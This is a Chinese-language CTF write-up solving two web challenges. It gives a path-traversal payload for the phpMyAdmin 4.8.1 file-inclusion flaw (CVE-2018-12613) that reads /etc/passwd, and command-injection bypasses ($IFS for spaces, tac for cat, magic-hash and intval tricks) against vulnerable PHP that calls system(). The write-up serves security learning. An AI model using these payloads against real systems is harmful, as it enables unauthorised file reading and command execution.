目录
[[GWCTF 2019]我有一个数据库](#[GWCTF 2019]我有一个数据库)
[GWCTF 2019]我有一个数据库
什么都没有, 尝试用dirsearch扫一下目录
可以扫到一个 /phpmyadmin
可以直接进入到数据库里面
但里面没什么东西
可以看到它的版本不是最新的, 搜一下相关的漏洞
phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin4.8.1 漏洞-CSDN博客
在index.php 也没有一个 文件包含漏洞, 可以目录遍历
include $_REQUEST['target'];
有相应的payload:
/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../etc/passwd
直接读flag 就行
[WUSTCTF2020]朴实无华
似乎有个header头跳转
扫一下目录 可以发现 robots.txt
抓个包 可以发现 /fl4g.php
全是乱码的, 不过不影响做题
php
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "鎴戜笉缁忔剰闂寸湅浜嗙湅鎴戠殑鍔冲姏澹�, 涓嶆槸鎯崇湅鏃堕棿, 鍙槸鎯充笉缁忔剰闂�, 璁╀綘鐭ラ亾鎴戣繃寰楁瘮浣犲ソ.</br>";
}else{
die("閲戦挶瑙e喅涓嶄簡绌蜂汉鐨勬湰璐ㄩ棶棰�");
}
}else{
die("鍘婚潪娲插惂");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "鎯冲埌杩欎釜CTFer鎷垮埌flag鍚�, 鎰熸縺娑曢浂, 璺戝幓涓滄緶宀�, 鎵句竴瀹堕鍘�, 鎶婂帹甯堣桨鍑哄幓, 鑷繁鐐掍袱涓嬁鎵嬪皬鑿�, 鍊掍竴鏉暎瑁呯櫧閰�, 鑷村瘜鏈夐亾, 鍒灏忔毚.</br>";
else
die("鎴戣刀绱у枈鏉ユ垜鐨勯厭鑲夋湅鍙�, 浠栨墦浜嗕釜鐢佃瘽, 鎶婁粬涓€瀹跺畨鎺掑埌浜嗛潪娲�");
}else{
die("鍘婚潪娲插惂");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "鎯冲埌杩欓噷, 鎴戝厖瀹炶€屾鎱�, 鏈夐挶浜虹殑蹇箰寰€寰€灏辨槸杩欎箞鐨勬湸瀹炴棤鍗�, 涓旀灟鐕�.</br>";
system($get_flag);
}else{
die("蹇埌闈炴床浜�");
}
}else{
die("鍘婚潪娲插惂");
}
?>
if(intval($num) < 2020 && intval($num + 1) > 2021)
使用 e 绕过 (本地测试一下就行)
num=2000e1
if ($md5==md5($md5))
md5=0e00275209979
网上挺多这样满足这样的表达式的数字 ,
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
过滤了空格 和 cat
tac 代替 cat
$IFS9代替空格 **get_flag=tacIFS$9f***